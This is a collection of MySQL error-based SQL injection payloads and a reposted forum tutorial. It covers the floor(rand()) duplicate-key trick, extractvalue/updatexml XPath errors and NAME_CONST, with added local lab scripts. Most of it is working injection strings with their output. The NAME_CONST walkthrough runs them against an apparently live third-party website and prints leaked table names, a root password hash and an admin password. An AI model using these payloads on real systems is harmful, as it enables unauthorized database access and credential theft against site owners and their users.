1. Error via floor()

The following payloads can be used (the floor(rand(0)*2) value appended by concat() is what forces the duplicate group key):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-entry message (the trailing 1 is the floor() value). To retrieve other data, replace version() with the desired expression. For example, to read the administrator's password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test (the 0x3a separator goes inside concat(), so that the XPath string starts with ':' and the error echoes it):

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
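The three primitives above can be reproduced end to end on a local MySQL 5.1+ server. The lab below is an added example, not code from the original post: the errlab database, the article and admin tables and their rows are assumptions chosen to match the session shown above. It also shows two things the post does not spell out: why floor(rand(0)*2) collides, and how to read values longer than the 32 characters the XPath error message displays.

```sql
-- Added example, not from the original post. Lab schema (assumed) mirrors the
-- session above: an injectable 'article' lookup and an 'admin' table to leak.
CREATE DATABASE IF NOT EXISTS errlab;
USE errlab;
CREATE TABLE article (id INT PRIMARY KEY, title VARCHAR(64), content TEXT);
CREATE TABLE admin (id INT PRIMARY KEY, username VARCHAR(32), pass VARCHAR(64));
INSERT INTO article VALUES (1, 'test', 'do it');
INSERT INTO admin VALUES (1, 'admin', 'admin888');

-- 1. Why floor(rand(0)*2) collides: rand(0) is seeded, so its sequence is
--    fixed (0,1,1,0,1,1,...). GROUP BY evaluates the key once to probe the
--    temporary table and again when it inserts a new group: row 1 probes '0'
--    and inserts '1', row 2 finds '1', row 3 probes '0' and tries to insert
--    '1' again. Three or more source rows therefore always raise ERROR 1062
--    "Duplicate entry" with the concatenated value in the message.
SELECT floor(rand(0)*2) AS k FROM information_schema.tables LIMIT 6;

SELECT * FROM article WHERE id = 1
  AND (SELECT 1 FROM (SELECT count(*), concat(version(), floor(rand(0)*2)) x
                      FROM information_schema.tables GROUP BY x) a);

-- Any derived table with at least three rows works; a UNION of constants
-- avoids depending on information_schema being readable.
SELECT * FROM article WHERE id = 1
  AND (SELECT count(*) FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
       GROUP BY concat((SELECT pass FROM admin LIMIT 1), floor(rand(0)*2)));

-- 2/3. extractvalue()/updatexml() (MySQL 5.1.5 and later): the second
--    argument is parsed as XPath and an invalid expression is echoed back in
--    ERROR 1105 "XPATH syntax error". A leading 0x7e ('~') guarantees the
--    syntax error regardless of what the leaked value starts with.
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x7e, (SELECT concat(username, ':', pass) FROM admin LIMIT 1)));

-- The message shows at most 32 characters, so long values are read in
-- 31-character windows (plus the '~') by moving the substring() offset
-- 1, 32, 63, ... until the slice after the '~' comes back empty.
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, substring((SELECT group_concat(table_name)
        FROM information_schema.tables WHERE table_schema = database()), 1, 31)), 1);
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, substring((SELECT group_concat(table_name)
        FROM information_schema.tables WHERE table_schema = database()), 32, 31)), 1);
```

Paste the statements into a mysql client one at a time. The first SELECT prints the fixed 0,1,1,0,1,1 sequence; the two GROUP BY statements fail with the server version plus a trailing 1 and with admin8881 in the duplicate-entry message; the extractvalue() statement fails with '~admin:admin888'; the first updatexml() statement leaks the lab's table names and the second, whose slice is past the end of the value, leaks only '~', which is the stop condition when paging.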
More collected payloads:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything older than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, it works here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column name '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the table names out.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this (0x6d7973716c is 'mysql' and 0x75736572 is 'user' in hex, which keeps quotes out of the injected string), and I get the duplicate column name 'Host':

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Time to finish it off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this (0x207e20 is the ' ~ ' separator)...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
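Both NAME_CONST forms on this page (the JOIN form in the collected payloads and the single-derived-table form in the tutorial) rely on the same server check, which is easier to see in a MySQL client than through a web page. The block below is an added example, not code from the original post or the reposted tutorial; the errlab database with its article and admin tables is an assumption, and any readable table serves the same purpose.

```sql
-- Added example, not from the original post or the reposted tutorial: the
-- NAME_CONST variants above, run in a MySQL client against the (assumed)
-- errlab tables so the error text is visible without a web front end.
USE errlab;

-- Baseline with literal arguments, accepted by every 5.0.12+ server: a
-- derived table may not contain two columns with the same name, so the
-- server answers ERROR 1060 (42S21) "Duplicate column name" and echoes
-- the name. That echo is what the payloads turn into a data channel.
SELECT * FROM (SELECT NAME_CONST('leak', 1), NAME_CONST('leak', 1)) AS x;

-- Form 1 (JOIN), as in the collected payloads: each side contributes a
-- column named after the NAME_CONST value, and derived table c has the clash.
SELECT * FROM article WHERE id = 1
  AND EXISTS (SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(@@version, 0)) a
                             JOIN (SELECT NAME_CONST(@@version, 0)) b) c);

-- Form 2 (one derived table), as in the tutorial: the same name twice.
SELECT * FROM article WHERE id = 1
  AND 1 = (SELECT * FROM (SELECT NAME_CONST(version(), 1),
                                NAME_CONST(version(), 1)) AS x);

-- Caveat: the documentation requires constant arguments. Newer servers
-- enforce that rule and refuse a non-constant name (a function call or a
-- subquery) with ERROR 1210 (HY000) "Incorrect arguments to NAME_CONST"
-- before the column clash is ever reached. The 5.0.27 target in the
-- write-up predates the check, and the "invalid calls" the tutorial
-- author hit on other sites are this error; on such servers fall back to
-- the floor() or extractvalue()/updatexml() forms from the first part.
SELECT * FROM article WHERE id = 1
  AND 1 = (SELECT * FROM (SELECT NAME_CONST((SELECT pass FROM admin LIMIT 1), 1),
                                NAME_CONST((SELECT pass FROM admin LIMIT 1), 1)) AS x);
```

Run the baseline first: if it does not produce the duplicate-column error, the server is not a candidate for this technique at all. If the baseline works but the version() or subquery forms return ERROR 1210, the server enforces the constant-argument rule and the other error-based primitives on this page are the ones to use.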